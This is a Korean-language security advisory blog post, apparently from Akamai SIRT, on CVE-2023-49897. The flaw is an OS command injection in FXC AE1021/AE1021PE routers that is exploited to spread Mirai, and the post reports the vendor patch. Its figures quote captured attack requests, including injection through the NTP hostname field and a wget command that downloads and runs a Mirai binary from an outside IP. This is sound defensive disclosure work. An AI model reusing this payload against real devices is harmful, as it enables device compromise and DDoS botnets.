FXC 라우터의 취약점을 적극적으로 악용: 수정됨, 패치 사용 가능
이 블로그 게시물은 InfectedSlurs 캠페인에 대한 SIRT의 이전 게시물을 업데이트한 것입니다.
핵심 요약
영향을 받은 벤더사 중 한 곳에서 패치된 펌웨어 버전과 가이드를 발표함에 따라 Akamai SIRT(Security Intelligence Response Team)는 InfectedSlurs 권고 사항 시리즈에 대한 업데이트를 발표했습니다.
이 취약점은 CVSS v3 점수 8.0으로 CVE ID가 CVE-2023-49897로 지정되었습니다.
영향받는 라우터 중에는 펌웨어 버전 2.0.9 이하를 실행하는 FXC(Future X Communications) AE1021 및 AE1021PE 콘센트 라우터가 있습니다.
인터넷에서 캡처된 악성 페이로드는 DDoS(Distributed Denial-of-Service) 봇넷을 생성하기 위해 Mirai 기반 멀웨어를 설치합니다.
Akamai는 원래 리서치에서 이러한 악용 시도를 식별하고 보안팀 직원 네트워크에서 발생할 수 있는 활성 감염을 식별하는 데 도움이 되는 광범위한 IOC(Indicator of Compromise), Snort 룰, YARA 룰 목록을 제공했습니다.
알아야 할 사항
SIRT는 InfectedSlurs를 발견하는 과정에서 실제로 활발히 악용되고 있는 FXC AE1021 및 AE1021PE 콘센트 라우터의 취약점을 발견했습니다. 이 디바이스는 호텔 및 주거용 콘센트 기반의 무선 LAN 라우터입니다. 이 디바이스는 FXC가 일본에서 제조합니다. 이 취약점의 CVSS v3 점수는 8.0이며 CVE ID는 CVE-2023-49897로 지정되었습니다.
이 취약점을 통해 인증된 공격자는 POST 요청을 통해 관리 인터페이스로 페이로드를 전달해 OS 명령 인젝션을 수행할 수 있습니다. 현재 설정에서는 캡처된 페이로드에서 디바이스 기본 인증정보를 활용합니다.
영향받는 펌웨어 버전은 다음과 같습니다.
AE1021PE 펌웨어 버전 2.0.9 이하
AE1021 펌웨어 버전 2.0.9 이하
벤더사(FXC)는 해당 취약점을 수정하는 디바이스 펌웨어의 패치 버전을 출시했습니다. 벤더사는 디바이스 소유자에게 가능한 한 빨리 펌웨어 버전 2.0.10으로 업데이트할 것을 권장합니다. 디바이스 소유자는 또한 디바이스를 공장 초기화하고 처음 부팅할 때 기본 관리 화면 로그인 비밀번호를 변경하는 것이 좋습니다.
벤더사의 권고 사항은 https://www.fxc.jp/news/20231206 에서 확인할 수 있으며, JPCERT에서도 https://jvn.jp/en/vu/JVNVU92152057/ (일본어 릴리스: https://jvn.jp/vu/JVNVU92152057/)에권고 사항을 발표했습니다.
관찰된 악용
인터넷에서 확인된 페이로드는 Mirai 기반의 멀웨어 설치와 관련이 있습니다. 이 캠페인은 DDoS 공격을 용이하게 하하는 봇넷을 구축하고 있으며, 봇넷 자체는 초기 게시물에서자세히 다루었습니다.
캡처된 공격 페이로드는 디바이스가 공장 출하 시 기본 인증정보를 사용하는 데 의존하기 때문에 인터넷에서 얼마나 많은 디바이스가 잠재적으로 감염되었거나 실제로 감염되었는지 추정하기는 어렵습니다.
공격자는 반드시 인증을 받아야 하기 때문에 공격자가 생성한 두 가지 고유한 상호 작용이 관찰되었습니다. 첫 번째 상호작용은 핑거프린팅 시도에 불과한 것으로 보입니다. 이 상호작용은 기본 인증정보를 사용해 /cgi-bin/login.apply 엔드포인트 URL을 대상으로 합니다(그림 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
그림 1: FXC 콘센트 라우터 인증 시도
인증에 성공하면 약 3초 후에 악용 페이로드가 /cgi-bin/action 엔드포인트 URL로 전달됩니다(그림 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
그림 2: FXC 콘센트 라우터 악용 시도
인터넷에서 캡처된 악용 페이로드는 OS 명령 인젝션 취약점을 활용해 MIPS로 컴파일된 Mirai, 변종의 배포를 시도합니다(그림 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
그림 3: 인터넷에서 관찰된 원격 코드 실행 페이로드
Akamai SIRT 팀은 최초 발표에서에서 이러한 악용 시도를 식별하고 방어자 네트워크에서 활성 감염 가능성을 식별하는 데 도움이 되는 광범위한 IOC, Snort 룰, YARA 룰 목록을 제공했습니다.
결론
IoT(Internet of Things) 표적 캠페인으로 인해 일상적인 소비자 디바이스가 자신도 모르게 수많은 악성 공격에 동원되는 사례가 무수히 많이 발생하고 있습니다. DDoS 봇넷 그리고 크립토마이닝은 디바이스가 영향을 받는 소비자가 전혀 알지 못하는 사이에 발생할 수 있는 잠재적인 결과 중 일부에 불과합니다. 어떤 경우에는 사용자가 이러한 디바이스에서 인증정보가 변경될 수 있다는 사실조차 알지 못할 수 있습니다.
따라서 일반 소비자를 대상으로 IoT 모범 사례와 관련 리스크에 대한 인식과 교육을 반드시 강화해야 합니다. 이러한 인식의 필요성은 소비자뿐만 아니라 이러한 ‘한 번 설정하면 더 이상의 설정이 필요 없는’ 디바이스의 제조업체에도 적용됩니다.
기본 보안 관행의 중요성
기본이 중요합니다. 이번 관찰 결과는 초기 설정 시 디바이스의 기본 비밀번호를 변경하는 것 같은 기본적인 보안 모범 사례의 중요성을 다시 한 번 강조합니다. 또한, 잠재적인 공격에 대비해 시스템을 지속적으로 업데이트하고, 시스템/디바이스가 이상한 행동을 보일 경우 수시로 확인하는 등 더욱 강력한 장기적이고 선제적인 보안 프로토콜을 구축하는 것이 중요하다는 점을 잘 알 수 있습니다.
관심 유지
Akamai Security Intelligence Group은 고객사와 보안 커뮤니티 전반의 경각심을 고취하고자 이와 같은 위협을 계속해서 모니터링하고 보고서를 작성할 예정입니다. 더 많은 리서치를 확인하려면 X(구 Twitter)에서 Akamai를 팔로우해최신 정보를 받아보시기 바랍니다.
Akamai SIRT는 통신, 조정, 식별, 수정, 공개 노력에 도움을 준 CISA, US-CERT, JPCERT, FXC에 감사의 말씀을 전합니다.
또한 쿠키 류(Kuki Ryu), 사사키 다카유키(Takayuki Sasaki), 요시오카 가츠나리(Katsunari Yoshioka)( 요코하마 국립대학교 )의 아낌없는 지원에도 감사의 말씀을 전합니다. 이들과 직접 협력하지는 못했지만, Akamai가 보고한 시점과 거의 같은 시기에 JPCERT와 FXC에 동일한 취약점을 보고했다는 사실을 알게 되었습니다. 모두를 위한 더 나은 안전한 인터넷 환경을 만들기 위해 적극적인 역할을 하는 보안팀 동료를 발견하는 것은 언제나 반가운 일입니다.
